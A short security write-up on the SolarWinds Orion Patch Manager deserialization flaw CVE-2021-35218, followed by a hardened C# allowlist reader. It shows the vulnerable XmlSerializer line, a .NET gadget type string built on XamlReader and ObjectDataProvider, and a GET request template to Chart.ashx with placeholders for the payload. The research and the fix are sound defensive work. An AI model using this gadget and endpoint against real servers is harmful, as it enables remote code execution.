50 Shades of SolarWinds Orion (Patch Manager) Deserialization (Final Part: CVE-2021-35218)

XmlSerializer xmlSerializer = new XmlSerializer(Type.GetType(context.Request.QueryString["tp"]));
tp=System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
GET /orion/PM/Chart.ashx/Skipi18n?tp=<type>&chart=<serialized data> HTTP/1.1
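
An added example, not code from the original post or from SolarWinds: the XmlSerializer line above takes its type from the tp query parameter, and this shows the hardened counterpart, where the request can only select a serializer that was built for a compile-time type. ChartSettings, ChartRequestReader and the "chart" key are hypothetical names, and the inputs in Main are constructed.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml.Serialization;

// Hypothetical DTO standing in for the data the handler is meant to read.
public class ChartSettings
{
    public string Title { get; set; }
    public int Width { get; set; }
}

public static class ChartRequestReader
{
    // Serializers exist only for types fixed at compile time.
    // The request selects one by a short key and never names a .NET type.
    private static readonly Dictionary<string, XmlSerializer> Allowed =
        new Dictionary<string, XmlSerializer>(StringComparer.Ordinal)
        {
            { "chart", new XmlSerializer(typeof(ChartSettings)) }
        };

    public static bool TryRead(string tp, string xml, out object result)
    {
        result = null;
        XmlSerializer serializer;
        if (tp == null || xml == null || !Allowed.TryGetValue(tp, out serializer))
            return false; // unknown key: no fallback to Type.GetType(tp)
        try
        {
            using (var reader = new StringReader(xml))
                result = serializer.Deserialize(reader);
            return true;
        }
        catch (InvalidOperationException)
        {
            return false; // malformed XML or unexpected root element
        }
    }
}

public static class Program
{
    public static void Main()
    {
        // Constructed inputs: one allowlisted key, one assembly-qualified type name.
        string xml = "<ChartSettings><Title>Patches</Title><Width>640</Width></ChartSettings>";
        object o;
        Console.WriteLine(ChartRequestReader.TryRead("chart", xml, out o));                      // True
        Console.WriteLine(ChartRequestReader.TryRead("Any.Type.Name, AnyAssembly", xml, out o)); // False
    }
}
```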

Jang
